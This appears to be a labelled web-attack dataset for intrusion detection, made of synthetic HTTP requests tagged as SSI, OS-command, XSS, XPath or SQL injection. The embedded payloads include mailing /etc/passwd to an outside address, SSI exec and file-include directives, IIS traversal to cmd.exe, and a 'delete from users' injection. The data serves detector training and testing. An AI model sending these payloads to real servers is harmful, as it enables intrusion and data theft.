GET /lQ6TZT.TBQu3U55Y8q/cW8/yadhnr/thZ1MT6pvP317k_btIr.bin?hfperlJzstyleShttpPg=e3nxanrr&v6=5&ohX=%29+++%28++%7C%28displayName%3Dhad*%29++%28name%3Dhad*%29%28++++mail%3Dhad*%29&Tadeobbo2ind=lo7l+drr+&ag=jrsk&nngmdiat4esgh=124973236&Nre3btloenebzm=a&hrprzrzi=ipshutdown%2By&apOjefavspbei=agnwuauifgtoNaof&akDg=1&eehrde=32197217&p5dsQm=87940716&aatovaa4e3ejent=mDtmpviw&Eio=619463&mtnfn0uh3v4coah=uiaipcie HTTP/1.1
Host: www.x6ra05.org
Connection: keep-alive
Accept: audio/*;q=0.3
Accept-Charset: *
Accept-Encoding: *;q=0.8
Accept-Language: eoCnohtn-El9Y;q=0.5, Sfznl-nppnse
Cache-Control: only-if-cached
Client-ip: 68.144.9.61
Cookie: tiuaa=g doeteto
Cookie2: $Version="988"
Date: Sun, 27 Nov 05 13:20:02 CET
ETag: W/"soqXkoKH3wNfz3Lwxq"
Expect: dtawu=4tsB
From: ssir@wcooTie.net
If-Modified-Since: Sun, 02 Mar 08 16:07:36 UTC
If-Unmodified-Since: Sat, 30 Jan 10 19:16:29 UTC
If-Match: *
If-None-Match: "GbVs1amUiJ9h-9Hn0"
If-Range: "rmUzG-z4owfuX9cIyerf"
Max-Forwards: 15
MIME-Version: 2.1
Pragma: no-cache
Proxy-Authorization: vLiie9 isIdet=nyae4rtc
Authorization: Basic Y3R0cjpvc3RpbDY=
Range: 55502-651
Referer: /SUiho/fleales/xdTEb/snxw8.php
TE: trailers
Trailer: TE
User-Agent: Mozilla/8.9 (Windows; U; WinNT 0.4; gi-ie; rv:7.8.0) Gecko/49794480
UA-CPU: MIPS
UA-Disp: 472,2226,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 649x451
Via: tTeb/3.4 www.lhOntHy.js, FTP/3.6 150.27.48.170, 5.9 www.NahDl.shtml
Transfer-Encoding: Hp0gR; yEri=enneCt
Upgrade: vmr4ce/8.6, ad1h/2.0, 4cr/6.0
Warning: 778 www.sriAh.html "u4ef" 
X-Forwarded-For: 94.140.32.18
X-Serial-Number: 03021
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 37923
Start - Id: 40755
class: SSI
PUT /Eidinsertkazt8KnR/akL-1lBV3/ST9documentTAXlNTr@pinsert.png? HTTP/1.0
Content-Length: 229
Content-Language: ujbo,hsai1lth,ihail
Content-Encoding: identity
Content-Location: http://atdblenp.com/zehiee/q7yiihdS/naoru.mpg
Content-MD5: aW95YW5oaHNlUnNkaTFhTg==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 29 Dec 06 18:35:20 UTC
Host: 183.201.176.62
Connection: haey
Accept: audio/x-wav
Accept-Charset: windows-1250
Accept-Encoding: *;q=0.3
Accept-Language: htelt-dp0a, Cphmb-oelaatrh, trmqio-fmd
Cache-Control: no-cache
Client-ip: 57.138.29.237
Cookie: mgRf=ghewsrzdinihp2soc;Q886b=i
Date: Sun, 26 Apr 09 10:32:10 GMT
ETag: W/"StD9lTanH-1yt1o"
Expect: eNay=ejiiueus;5h5utnem
From: nsnsb@neop.it
If-Modified-Since: Wed, 18 May 05 21:34:40 CET
If-Unmodified-Since: Tue, 02 Mar 10 03:09:01 UTC
If-Match: *
If-None-Match: *
If-Range: Thu, 28 Jul 05 19:01:12 GMT
Max-Forwards: 239
MIME-Version: 8.0
Pragma: 2f=sirrs
Proxy-Authorization: NTLM SW5hcmx0ZTA2Zmk3ZWt0bGUxZW50aHNpaFJvcm5wc2llZWFlZXVkbmF0cWxh
Authorization: Basic bmZuamhzOmlFSXMzeg==
Range: 30-86033,50297-483952,510771-833674
Referer: /aoecont.pdf
TE: trailers,gzip,trailers
User-Agent: u3qhv9 http://www.8dhnoate.org
UA-CPU: MIPS
UA-Disp: 442,6070,32
UA-Color: color16
Via: 7.7 227.85.50.169, HTTP/7.6 240.155.190.55, 8.3 www.yY0E1uth.jpg
Transfer-Encoding: deflate
Upgrade: etg/2.7
Warning: 515 255.26.146.194 "etiqarDie" 
X-Forwarded-For: 31.100.82.188
----: -------------

tatw7=1&egN58Ae51Xsn=[&_z_Rn-q=att&axsrnl0U=cohmCLjucoetrfi9n&mGhesamLy_=4710403975&MFqff=<!--#odbc connect="ajll,2En,aghm5"     statement="select   *    from    gtut"-->&LlikeiOE=hvb.l5FhxAF&pcito6imn=6

End - Id: 40755
Start - Id: 40479
class: SSI
GET /t2oQm0uJ-rnpRG./uZ/caKsapaiOv/79nph-Fzftp/aOrX2NTUovyfW/s0.cfm?suhd6reds=+RdoboadtelsTb&mcihALor=879&raeesheIs=RatsrokuNcHf&f0V36documentX7ve=13305405&mB11OZ=Po5qesock_streamoid%26ta&pdys=sl&ammiheh0e=mSprn&ao=8iinaUsampmcc0eui&ftNYsew5=u5%40s-vN&91htaccesoeIp=%3C%21--+%23include++virtual%3D%22d%3A%5Cwindows%5Cautoexec.bat%22+++++--%3E&etelrehehohpen=1466066 HTTP/1.0
Host: 98.153.47.146
Connection: arla
Accept: image/jpeg;q=0.4, text/*, application/*;q=0.6
Accept-Charset: *
Accept-Encoding: gzip;q=0.2, deflate
Accept-Language: *;q=0.6
Cache-Control: no-store
Client-ip: 254.154.187.94
Cookie: 299LlibI-E1=o oe;selretfdxeagonr=f8lsne-o;gti=tdeanu lr8n;ph4nayliec=tthrwtre0rtq
Cookie2: $Version="524"
Date: Wed, 12 Aug 09 09:16:05 UTC
ETag: W/"FGqTlYRcSn07Vq9zDb"
Expect: 100-continue
From: Meara5ka@omiicnkiy.st
If-Modified-Since: Wed, 23 Sep 09 23:56:41 GMT
If-Unmodified-Since: Sat, 04 Sep 04 08:52:46 CET
If-Match: *
If-None-Match: "h4v86sB7siBekV4PXd"
If-Range: Mon, 27 Aug 07 21:59:31 CET
Max-Forwards: 3
MIME-Version: 7.1
Pragma: no-cache
Proxy-Authorization: Gdzho e8cm6Rl=tdiaor
Authorization: Digest algorithm=MD5-sess
Range: 6740-758,0802-
Referer: /Buotyl1r/ycEgr/ahsLraoh/oRnlsht/i3h8NndA.asmx
TE: chunked,gzip
Trailer: Host
User-Agent: Mozilla/4.0 (X11; U; Unix 8.9; a3-LI; rv:6.8.6) Gecko/35848321
UA-CPU: PowerPC
UA-Disp: 609,4490,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 7701x851
Via: HTTP/2.6 www.tuaktt.js:5
Transfer-Encoding: compress
Upgrade: Fgc8t/0.2
Warning: 565 www.mo1i.jpg "difinztedvtd" 
X-Forwarded-For: 50.57.73.228
X-Serial-Number: 98565372421828
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40479
Start - Id: 43125
class: OsCommanding
GET /r1ItwE.dll?ewrHpessuo=n7&i0scu0isda8=lwhaspIltovux&Cm2rnsmvat=44402&eeekenewpg=Tivaeootii&2nkSaxu=705499&Yxu6zsvHeoriEsl=4ho+Mtme&wyhlaidt=e%27&GWTsv=na&eiMhsce0dhNob=Nrepd&nrrwkeBrTn2aYe=14157261&jVotaark5Mc=944814650&nrnee=mail+++++xet4hry3%40n8s9o.kwetnic.gov%3C%3C%2Ftmp%2Fwu.c+++%3B HTTP/1.1
Host: 15.100.28.48
Connection: close
Accept: */*;q=0.6
Accept-Charset: x-mac-hebrew, utf-8;q=0.4, cp-932
Accept-Encoding: identity;q=0.1, identity;q=0.5, identity, deflate;q=0.5, deflate
Accept-Language: *
Cache-Control: min-fresh=563
Client-ip: 147.97.228.238
Cookie: iw0ho=74;FnQ998XMFw5=eo
Cookie2: $Version="87"
Date: Sun, 03 Dec 06 20:51:54 CET
ETag: W/"xZgq7w4Z0E7TALT-"
Expect: spfinn
From: ydaj1@ewfas0rh.de
If-Modified-Since: Fri, 07 Aug 09 06:35:31 UTC
If-Unmodified-Since: Tue, 10 Jan 06 01:09:37 GMT
If-Match: "Y74mUsxrAkzQ-bBI"
If-None-Match: *
If-Range: Wed, 23 Apr 08 17:08:31 UTC
Max-Forwards: 9774
MIME-Version: 9.7
Pragma: kae='nrif'
Proxy-Authorization: qgem2 pmastofe=hwHts
Authorization: Digest uri=http://ehobetU.st/3ngtancL/trar.php4
Range: 94856-,22-022
Referer: /gmhmap/smii/rare9.php
TE: deflate;q=0.7,deflate,deflate
Trailer: Host
User-Agent: Mozilla/4.3 (Windows; U; Windows NT 4.7; oo-tb; rv:4.8.1) Gecko/19509634
UA-CPU: Sparc
UA-Disp: 3218,793,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 556x187
Via: 6.4 25.33.100.197, 6.4 44.91.72.129:8773, FTP/7.9 www.trko.tiff
Transfer-Encoding: identity
Upgrade: ftb/0.9, eeti/9.1
Warning: 169 190.90.41.27 "mteulHh6dilaof" 
X-Forwarded-For: 209.100.60.54
X-Serial-Number: 231798615796568
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43125
Start - Id: 43084
class: OsCommanding
PUT /c9./l.zM@nGM.gif? HTTP/1.1
Content-Length: 234
Content-Language: estem
Content-Encoding: gzip
Content-Location: http://aaanfS4L.org/lloorq1t/o8istpTj/fotdeqE/Cser0oi/sb1ne.dll
Content-MD5: QXNlZWVzZnduaHl2bXNlRQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 02 Apr 08 10:23:26 GMT
Last-Modified: Sat, 09 Jan 10 15:08:34 UTC
Host: 36.101.228.11:80
Connection: close
Accept: */*
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: no-cache
Client-ip: 56.53.104.65
Cookie: mohRN7a=[;mhe0jimeiwpotrn=csnuiDmLytarmobi;hsemcursO=helieufarxhDlp
Cookie2: $Version="38"
Date: Tue, 23 Nov 04 13:15:02 GMT
ETag: "FDUu-B@bbhg0TtN"
Expect: 100-continue
From: AtrE@isjnwtx.gov
If-Modified-Since: Fri, 02 Nov 07 23:22:51 GMT
If-Unmodified-Since: Sat, 19 Mar 05 12:30:04 UTC
If-Match: *
If-None-Match: *
If-Range: "UnzgtYQ3ZshVSzp4d"
Max-Forwards: 292
MIME-Version: 8.2
Pragma: no-cache
Authorization: NTLM YWhhamxoQWJyN3NaM2kwdGloZGU4aWR4c2ExdGRMbGhsdGR0b2VhZQ==
Range: -57,-072,-891
Referer: http://g4sc.cz/rAisteI.dll
Trailer: Pragma
User-Agent: gsfNyietar (5eOA7DxZ; xhOKHe)
UA-OS: Win98
UA-Color: color8
UA-Pixels: 9690x5155
Via: 7.3 168.28.175.37
Transfer-Encoding: deflate
Warning: 478 www.atuy.css "969s" 
X-Forwarded-For: 228.11.44.229
X-Serial-Number: 40230109634299756754
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

vnslx4eiot=unph-Ip&4o5ysenyhnp=oops  ;     cat  /etc/passwd  |   mail  your@shh4m.com&e2truketM=nn rumstvelinkn4htpass[&iholncd=ltslhsNanoo&F9dVdt4U=7|&2eudwrn7hkaf=i&ot6E4eCtYnfo=e]4UstyleeshRH edp&hTnAhetoa=608714685

End - Id: 43084
Start - Id: 47364
class: XSS
GET /ogdgdmt/n@1HRn/ywQStMlIL/wV9klTIS@ZscopyC6w/t7jScQnQr@67pBmmTPrZ/ty8ee/cfyuaottrorKiurusrsg/9UWC.aTqWTTRkg/ab/4j0hNteEcjGseiw.jpg?ljI1seieC=smj8&llNiheoeHordo5=%3Cimg++src+%3D++++%22+++++llerar%22onmouseover+%3D++%22++%5Balert+++%28%27BvteteLrf%27%29%3B%5D++%22++%3E&Ose=eu&preB2=2385166&esEtulnmy4Ni=536584&Aonrel=t&eee0eewe=17367&zopt=aluPreecrnGbnw&if8wsnueARcxe=oepasswd3&aie5tiqe4t1nic=7 HTTP/1.1
Host: 214.85.98.204:116
Connection: tesghcgt
Accept: audio/*;q=0.5
Accept-Charset: *
Accept-Encoding: 
Accept-Language: 5E-ep6rswb;q=0.5
Cache-Control: only-if-cached
Client-ip: 30.118.108.110
Cookie: edmg3o=yKdY9j-diP;e3px4ln=ac;Oaweih=oq1qe;lSeI6oi=sDi;ooeantjsqef= %and
Cookie2: $Version="004"
Date: Thu, 15 Sep 05 12:12:10 UTC
ETag: W/"PjYKmUAHLLYd8gcE5"
Expect: 100-continue
From: Rlpr@aeautrol.org
If-Modified-Since: Sun, 11 Sep 05 03:55:38 UTC
If-Unmodified-Since: Mon, 13 Jun 05 03:06:57 GMT
If-Match: "nmlIO437YhYhptc"
If-None-Match: *
If-Range: *
Max-Forwards: 78
MIME-Version: 8.1
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: NTLM b3lobHJ0bnRjY2FpRHN1YTkzeHMyb2NvdHJ0eXFlaXRFb2Fnbmhh
Range: -773710,2145-890
Referer: /eirOri/iuawt/ovin/c4mdh76i.mpeg
TE: gzip
Trailer: Trailer
User-Agent: rvdzvu3 http://www.nEsde.be
UA-CPU: MIPS
UA-Disp: 0297,0237,8
UA-OS: Win95
UA-Color: color32
UA-Pixels: 605x5902
Via: 4.5 www.ra7ade.gif:96022, Rzlm/8.3 183.113.72.221
Transfer-Encoding: srSoe; iOhim=atq4
Upgrade: ek7/9.9, ih4i/2.6, tncaf/1.8, fikd/2.8, enm/1.6
Warning: 970 233.253.83.48 "nctm" "Thu, 06 Nov 08 08:21:23 GMT"
X-Forwarded-For: 131.225.250.219
X-Serial-Number: 0450626600564347
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47364
Start - Id: 49967
class: XPathInjection
GET /edohg/aBhsHBel5NIHUSRb0fnG/hkBSKuvRBQE/dBaeiaErenretlttraat/aensemlsnsduh0.php3?Yw2ogqxya=s3soraht%27++or+path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3DN%5D++or++++%27hibo%27++++%3D+%27 HTTP/1.1
Host: www.aulddewh.it
Connection: tsiunn
Accept: audio/x-wav;q=0.2
Accept-Charset: *
Accept-Encoding: deflate;q=0.0
Accept-Language: eeoOct-tds2;q=0.6
Cache-Control: only-if-cached
Client-ip: 164.99.223.41
Date: Sun, 21 Jan 07 12:57:05 UTC
Expect: ahthray
If-Modified-Since: Wed, 11 Jul 07 04:45:53 UTC
If-Unmodified-Since: Tue, 07 Apr 09 10:57:19 GMT
If-Match: "sHiQSfYOv5ma6Q5"
If-Range: Sun, 14 Aug 05 13:04:39 CET
Max-Forwards: 1858
MIME-Version: 2.7
Pragma: se='lWyd1'
Authorization: Digest response="fd530FB1f4d6e6B5795Acf09EE08cC4F"
Referer: /aT9gfed/O8cr/kwud.swf
Trailer: Accept-Encoding
User-Agent: dMsGck http://www.ltydl0.be
UA-OS: Linux
Via: eon/8.4 118.143.237.205

null

End - Id: 49967
Start - Id: 48048
class: XSS
GET /LwV6-RdDc0metavn/8gPd7UiI1/alsphtlon5Ceriamwew/mralyyufH/ofeltomhadR0re/tms4ehTnzgbo3Rer0bso/sjnu/dMo@Zb_9_8p1_.png?CFZUaRshvO=t5orwrcpl&FSm9=dtf9ig&bodywget7UlGaZscript=%3Cimg+++++src%3D%26%7B%5Balert+++%28%27xeO3%27%29%3B%5D%7D%3B+%3E&oohhr=aEvi&a1srnf=1477414&megtow8mQrs20s=8470180100&oaric2=ea7In6aT4sacceptq%40oea%7C&fmostalenn9Ts=uN6&hEoobu=9caccess_log&setteSn9tt4na=oxtermnw&slm=7obbES_lx HTTP/1.0
Host: 146.67.247.185
Connection: keep-alive
Accept: audio/x-wav;q=0.3, image/jpeg
Accept-Charset: *;q=0.7
Accept-Encoding: compress, gzip, deflate
Accept-Language: cMbeH-tf;q=0.1
Cache-Control: a='EWd'
Client-ip: 252.198.126.142
Cookie: Y@YYa7uWtmpz=694;systemsock_streamAS.Dp@D=W5dxadaRlm;dxgih=vs;rt8sxgdqoeezig6=0otEuepgrd;mhsm=e0iesrrOeO;rmipaexafoio=13119914
Cookie2: $Version="742"
Date: Thu, 25 Aug 05 08:32:44 GMT
ETag: "ftqa6XY_5ZG@bt8XCr3"
Expect: anmte=7mtotl;taCmh=mwueaUo
From: elwwua@EmhIEncw.it
If-Modified-Since: Fri, 17 Nov 06 12:40:11 CET
If-Unmodified-Since: Fri, 29 Aug 08 05:57:08 GMT
If-Match: "K@Khny7gTyjh2Z8"
If-None-Match: *
If-Range: *
Max-Forwards: 9426
MIME-Version: 6.0
Pragma: no-cache
Proxy-Authorization: jae8sr 0tnaix=eudc
Authorization: Digest cnonce="teyEiuxT"
Range: 16-601
Referer: http://www.naous.de/8rna/hSss.asp
TE: trailers
Trailer: Accept-Charset
User-Agent: nOc4Jqw- http://www.34mtgi.gov
UA-CPU: StrongARM
UA-Disp: 0372,351,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 9126x119
Via: 9.0 www.t33pa.tiff, oh3i6e/3.3 68.53.176.230
Transfer-Encoding: identity
Upgrade: ohr/0.8, dird/9.6, ccspda/7.4, eaonS/0.7, xbT1yr/6.0
Warning: 931 43.142.35.211 "tUI3qeeCt" "Mon, 16 Feb 04 11:58:32 CET"
X-Forwarded-For: 188.45.251.30
X-Serial-Number: 405569074263988888
----: -----------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 48048
Start - Id: 44108
class: OsCommanding
GET ..%u00255c..%u00255cwinnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: 127.202.170.31
Connection: close
Accept: image/jpeg
Accept-Charset: *
Accept-Encoding: *;q=0.2
Accept-Language: ws-s1t, siyze-eyOsm;q=0.3, le3-e2eS, ehovhm-h;q=0.5
Cache-Control: no-transform
Client-ip: 212.7.68.146
Cookie: cuhwme4aae=647
Cookie2: $Version="81"
Date: Tue, 03 Feb 09 03:10:05 GMT
ETag: "6ppIn19@NaQSoJPiB"
Expect: 100-continue
From: nvabn6ks@5obcxtres.uk
If-Modified-Since: Sat, 22 May 04 13:54:30 CET
If-Unmodified-Since: Thu, 27 Jan 05 01:37:53 UTC
If-Match: "Uv1ZNf812leJATaD"
If-None-Match: *
If-Range: Tue, 15 Apr 08 05:32:13 UTC
Max-Forwards: 6
MIME-Version: 4.3
Pragma: T=6hHjaal
Proxy-Authorization: NTLM YTlha3RlZjlua29weWVzb2s3MW5yemFoMm5wbk4waVJzZW9ndG4zTGhpOGh0aQ==
Authorization: NTLM aGN6aTVpd3RycnFzdGJvaHN0MnVqc2xpZ25hYWVkZm9saw==
Range: 70-
Referer: /iEymin/odldudAe/pag8wnes/uelqihyh/eddrtst.exe
TE: deflate
Trailer: Date
User-Agent: eEt61rE/4.7.0.1.9
UA-CPU: x86
UA-Disp: 224,424,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 1501x189
Via: 5.3 201.253.147.38, hGpre/8.3 207.50.65.250
Transfer-Encoding: gzip
Upgrade: 8sjta/1.7, OaiEm/9.0
Warning: 552 www.5qeog.tiff "0tt4tuzwrsgn" 
X-Forwarded-For: 2.74.16.0
X-Serial-Number: 008751
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 44108
Start - Id: 36644
class: OsCommanding
GET /hsUNroolRn/IvmneisTv/1eo1y3taasiasrheap/rCc/hrl9nw0meietv0T/mhI/ee3OSeDCHmAp.tiff?iulnr=aT0AT2w-psQ&aeeernlAoit=ooe&e2nirhinyota=citlocationtsIld&ei4boOa3i3o=khdnunionooi%5Cm+d+dZNf0au HTTP/1.1
Host: 42.165.87.243:80993
Connection: close
Accept: audio/*;q=0.0, application/*
Accept-Charset: *
Accept-Language: Nutroe-Rx5;q=0.3, bnz-iWAm
Client-ip: 210.245.200.43
Cookie: e3iriMedth=81.199.182.66 |  dir
Date: Sun, 02 Dec 07 08:22:19 UTC
ETag: "OKjIA9w1MTsHeSz@cF"
Expect: sihndh=oleiadir
If-Unmodified-Since: Mon, 18 Sep 06 03:13:29 GMT
If-Match: "y1MxXJEhfVPYHCtNV"
If-None-Match: *
Pragma: no-cache
Referer: /aiatgno/wtaci.fgf
User-Agent: Mozilla/5.0 (Machintosh; U; Mac OS X 1.2; u1-hn; rv:6.2.1) Gecko/61614103
Transfer-Encoding: compress

null

End - Id: 36644
Start - Id: 39945
class: SSI
POST /tR5VLWQHddpazWG.jpg? HTTP/1.0
Content-Length: 266
Content-Language: tezio,nrat,f
Content-Encoding: compress
Content-Location: http://www.aehrqkn.be/ashm.avi
Content-MD5: dHppcTBNaXNudGl3MG1vOQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 07 Sep 09 12:45:07 UTC
Last-Modified: Fri, 04 Nov 05 03:07:56 CET
Host: www.inoedtro.be:80
Connection: keep-alive
Accept: text/plain, text/*
Accept-Charset: *;q=0.1
Accept-Encoding: *
Accept-Language: *
Cache-Control: zbelch=Qckoo
Client-ip: 195.128.80.161
Cookie: iaowor2iir=mfhtOaamni;LtxroSfh8enj3ri=rhaxeoaTj;h-yOvkI3xp_=aVBpgMvyL;fm7es5=rs~s~sunionwc
Cookie2: $Version="977"
Date: Fri, 05 Nov 04 11:23:01 GMT
Expect: acstne=Sh1yt
If-Modified-Since: Sat, 15 Mar 08 06:51:39 UTC
If-Unmodified-Since: Thu, 05 Mar 09 23:51:43 CET
If-Match: *
If-None-Match: *
If-Range: Tue, 21 Dec 04 04:54:50 UTC
Max-Forwards: 4944
MIME-Version: 5.1
Pragma: no-cache
Proxy-Authorization: NTLM MnQ0N3d2bnRjbTF3dGQzdEFha2l0bjlybHhocGxhaGVlbnRsbjhhclI=
Authorization: wurmu dgxOi2=snshjh
Range: 1-586
Referer: /tioe.nsf
TE: trailers
Trailer: From
User-Agent: Mozilla/7.3 (Machintosh; U; PPC 6.1; jI-et; rv:8.1.4) Gecko/40853111
UA-CPU: MIPS
UA-Pixels: 3924x987
Via: ra2g/2.6 www.eeea.png:81, 3.4 39.145.155.170, FTP/2.3 www.jkuhxce.gif:7
Transfer-Encoding: deflate
Upgrade: AWutq/3.3, Ereghm/5.5, aashd/6.2, ypndU4/8.9, Egoa/7.9
X-Serial-Number: 029145604

FidnJ=ohq&uEjih=hX_PYA9J&ri49woNcep=411060&teo=tHg%40&%uy-ED888T=rso%3F%40iIan%5Csehttpstv&mrhan=uBEFgpC8WKw&i7eHnwCw=aqjIE&6amsd9uoiisea=76394&ykr6Mgi7pqne=tr1asystemr&eOe=734060&TXXde=%24c+%2F&oedtdn=%3C%21++++%23%3C%21--++++%23exec+++cmd%3D%22id%22--%3E&avhboe=30

End - Id: 39945
Start - Id: 41179
class: SqlInjection
GET /7wR94/uTe5/be14h3sdoh1eai6tt/zdhm/mos1o1t/q.x@5jVkSUMd/fja/issOSF/QO/eMJw0L5-nRq/vS@ptJt/ABstyleQEZNgcatQH-.js?eeuihtdr2nBRid=etearAs&7oco4qtlr0oesxi=18685245 HTTP/1.0
Host: 50.212.174.64
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: gzip, deflate, gzip;q=0.4, deflate;q=0.2, identity
Accept-Language: ' );  delete   from users; commit;    dummy( '
Cache-Control: min-fresh=97687
Client-ip: 126.236.48.71
Cookie: onlmsoEjc=sAvq11;hesmsdo=geyg;n4hwoooenE=24820;EzzincludeSxscriptH.V=aOoqtstdin
Cookie2: $Version="21"
Date: Thu, 21 Oct 04 22:45:56 UTC
ETag: W/"Uu@KUzA.0IwnkVwHL"
Expect: hslny
From: mecty@ntysdF.de
If-Modified-Since: Mon, 20 Feb 06 02:39:44 UTC
If-Unmodified-Since: Wed, 01 Aug 07 11:30:57 CET
If-None-Match: "ElBCQ8Lawoz48ph3.836"
If-Range: Mon, 01 Oct 07 24:30:12 GMT
Max-Forwards: 4658
MIME-Version: 9.6
Pragma: rWne='eeesSra'
Proxy-Authorization: me0i lldsic=km85srx
Authorization: NTLM R290b2VybWVzaExzaWl0YW50Z0xhRWRzbWFlY1BtZGlv
Range: -904358
Referer: /Ck2eh/tendshd/zjolewE/sanFle/eh8ttarf.mp3
TE: chunked;q=0.9,chunked;q=0.2,trailers
Trailer: Accept
User-Agent: Mozilla/9.7 (compatible; Konqueror/3.1; Windows NT; k1rO6; a2cbsiodtt; d09etiu)
UA-CPU: MIPS
UA-Pixels: 724x926
Via: HTTP/2.6 195.184.224.72:151, 8.5 45.236.251.199, s2k/4.4 www.asi7cra.css:2
Transfer-Encoding: compress
Warning: 635 32.98.107.131 "fevems8rhtt" 
X-Forwarded-For: 112.176.54.6
X-Serial-Number: 800944
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41179
Start - Id: 40363
class: SSI
GET /i47avJLXRMdK4H/i83vvar.K/byj3ifch0/ayM/e./oferohgt6gsso/L2isnDnrmtealdhl5/c5/sHgc8H90Xe/c64IInwspZ4KNsH8ZAb0.jpg?e9HoQzte=taM_Q-mT&TvVWvacceptqka=e3F&sy6ndfasmtnr=%3Codfnpaadminhho&homlN1=k._z&tlwp-_qPInMUXc=5cirdRemoisoaa4Pka&7drna1oslesm=9372047&Emx348h=2 HTTP/1.1
Host: 62.39.203.203:80
Connection: close
Accept: */*
Accept-Charset: x-mac-japanese, x-mac-chinesetrad;q=0.5, x-mac-chinesesimp;q=0.5, windows-1250;q=0.4, macintosh
Accept-Encoding: 
Accept-Language: <!--   #include    virtual="c:\winnt\system.ini" -->
Cache-Control: max-age=5
Client-ip: 99.50.145.47
Cookie2: $Version="1"
Date: Sun, 24 Dec 06 19:13:18 UTC
If-Unmodified-Since: Tue, 20 Jul 04 02:38:01 UTC
If-Range: Wed, 20 Oct 04 13:12:58 CET
Pragma: no-cache
Authorization: NTLM ZDluaWdkcFdhb3djZGlnTzFvbTFsYXdoY2FhZWVjY3NwYVM=
Referer: /isohisie/aati/yhilvma.wav
User-Agent: esDXID8 http://www.pouiyS.net
Via: FTP/1.7 www.ie6a.js, 9.1 www.tvelwe.gif, 9.4 www.etBi.jpg

null

End - Id: 40363
Start - Id: 39803
class: SSI
GET /wXLoctXmK2_JNn/g8rBGVuhyO/tE8k-eXya/ozsnzs6eddnr/zpsgKZ4.mdb?MHQselectXg3in7formmp=1170567369&EFerci=72&erOohhrsm=h%3Fnap&_7LNpg=7e7eeYd9&tIrrrtm=h_YN8W6v&nI=%3C%21--+++%23include+++++virtual%3D%22%2Fetc%2Fpasswd%22--%3E&-MzA=ayfetsrnnaA3se HTTP/1.1
Host: www.eeAhamct.ch
Connection: close
Accept: */*;q=0.9
Accept-Charset: *
Accept-Encoding: gzip;q=0.6, compress;q=0.3, gzip
Accept-Language: a04aot-rrntKhnl;q=0.6, 0-8o, srophteo-rt1c
Cache-Control: e='ejMl'
Client-ip: 88.15.240.28
Cookie: 2QWMY4YZ1=2tI esteypaSrug;rhaHreszoaaax37=RiElipA;ms-G=1973;rtnryolitobe0=eDassoeiey
Cookie2: $Version="9"
Date: Thu, 14 Oct 04 08:42:41 GMT
ETag: W/"HB4MgAj2e0M.0QXb"
Expect: dNlo
From: bny0t2@rj5o.gov
If-Modified-Since: Mon, 25 Aug 08 22:09:53 GMT
If-Unmodified-Since: Thu, 06 Nov 08 06:28:18 GMT
If-Match: "5S2a5xeq29wu6Auy"
If-None-Match: *
If-Range: Tue, 07 Dec 04 16:20:11 GMT
Max-Forwards: 5348
MIME-Version: 1.9
Pragma: eutiedla='ienmj'
Proxy-Authorization: Digest nc=Ca5d26eD
Authorization: NTLM bnRuaXJocmJHaWFIMHl1ZGVJZGRjYW90RTJzenRnNHJsNQ==
Range: 2975-
Referer: http://www.hetEteS.cz/rei5/sssg/srvr/rkyogAan.bin
TE: trailers,gzip,trailers
Trailer: Trailer
User-Agent: Mozilla/3.3 (X11; U; Open BSD i586 1.0; aS-Ye; rv:3.6.7) Gecko/75407674
UA-CPU: Sparc
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 468x7869
Via: HTTP/4.3 www.geBiqrHi.tiff, 5.5 49.157.254.236
Transfer-Encoding: gzip
Upgrade: oLt/5.9, tEgb/6.9, 6laet/2.7, faare2/0.4, vst20/6.5
X-Forwarded-For: 142.194.73.31
X-Serial-Number: 0280999804959
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39803
Start - Id: 44262
class: OsCommanding
GET /images/.%2e/.%2e/.%2e/.%2e/winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: www.5Rid2moOSs.de:80
Connection: keep-alive
Accept: audio/x-wav
Accept-Charset: windows-874, x-mac-chinesesimp
Accept-Encoding: 
Accept-Language: ve-hntsp
Cache-Control: only-if-cached
Client-ip: 225.50.172.247
Cookie: iza=250635
Cookie2: $Version="544"
Date: Wed, 18 Nov 09 07:49:53 UTC
ETag: "HzqQFUqehcIoGlGbs_6"
Expect: 100-continue
From: Ce9h0dvt@naeheOu.st
If-Modified-Since: Mon, 19 Sep 05 05:53:20 GMT
If-Unmodified-Since: Sat, 24 Jan 09 23:48:29 UTC
If-Match: *
If-None-Match: *
If-Range: "lzLhUagNQisyk3rR7D0u"
Max-Forwards: 9
MIME-Version: 4.2
Pragma: at7b='e'
Proxy-Authorization: YOigog n4on=aery00e
Authorization: Ee5lv koctmu=lcpnt
Range: 9644-,6569-1848
Referer: /Iofyet/rzsgr/gzcNeaoI/rofdae.mpeg
TE: gzip
Trailer: Accept-Language
User-Agent: Mozilla/9.4 (Machintosh; U; Mac OS X 1.3; lE-re; rv:9.6.1) Gecko/55785493
UA-CPU: 68000
UA-Disp: 9070,4804,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 7064x6561
